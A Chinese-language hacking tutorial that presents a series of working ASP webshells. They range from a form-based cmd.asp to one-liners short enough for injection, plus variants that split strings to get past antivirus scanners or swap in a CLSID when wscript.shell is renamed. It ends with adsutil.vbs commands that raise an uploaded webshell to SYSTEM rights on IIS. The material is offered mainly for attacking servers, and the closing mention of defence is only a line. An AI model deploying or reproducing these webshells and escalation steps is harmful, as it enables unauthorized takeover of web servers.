拿虚拟机上的网站,echo是最好的办法了,如果asp的马cmd不能执行,可以换其他的试试,aspx的许可以,若还是不行,上传个cmd上去,有个专门执行cmd的后门程序
第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
这里用了response.write,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp
<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>
好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:
<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>
当然,classid值在不同系统下有所不同。这个要自行更改
第六个,被一些杀asp木马的软件检测出来怎么办?
把变量拆开呀。代码:
<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>
或
<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>
这里代码引号里的东东都可以随便拆的,像还可以拆成
<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c "&request("c")).stdout.readall%>
第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:
<%=server.createobject("wscript.shell").exec("e:aspxcmD.EXE /c "&request("c")).stdout.readall%>
第8个,asp代码可以加密吗?
当然可以
asp 马提权
asp.dll的执行权限是IWAM_computername 是GUEST组的,权限很低,所以,许多人上传了ASP木马,虾米也不能干
IIS的配置参数在 metabase.bin中,其中层LM/W3SVC/INPROCESSISAPIAPPS里,有一些ISAPI的文件
而这些文件运行是又inetinfo.exe启动 的,继承了system权限 (黑洞企业版运行也是system权限的)
所以,只要将不属于 LM/W3SVC/INPROCESSISAPIAPPS 的ASP。DLL加到LM/W3SVC/INPROCESSISAPIAPPS里就有了system权限
怎么办: 系统里有个adsuti.vbs可以对metabase.bin进行修改
而adsuti.vbs在C:\inetpub\AdminScripts里
所以,先跳转到 C:\inetpub\AdminScripts里
查看一下原来LM/W3SVC/INPROCESSISAPIAPPS里有哪些dll文件
cscript adsutil.vbs get W3SVC/INPROCESSISAPIAPPS
然后显示出的所有dll的路径都复制下来
然后用adsutil把asp.dll添加进去
输入 cscrip adsutil.vbs set W3SVC/INPROCESSISAPIAPPS "xxx/xx.dll" "xxx/xx.dll" "xxx/xx.dll" ··················(也就是上面叫你复制的那些dll的路径) 最后一个输入 "c:\winnt\system32\inetsrv\ASP.dll"
注意一下 :每个具体路径都要加引号 每个路径都要用空格隔开
知道了这些.知道该如何防止ASP木马提权了吧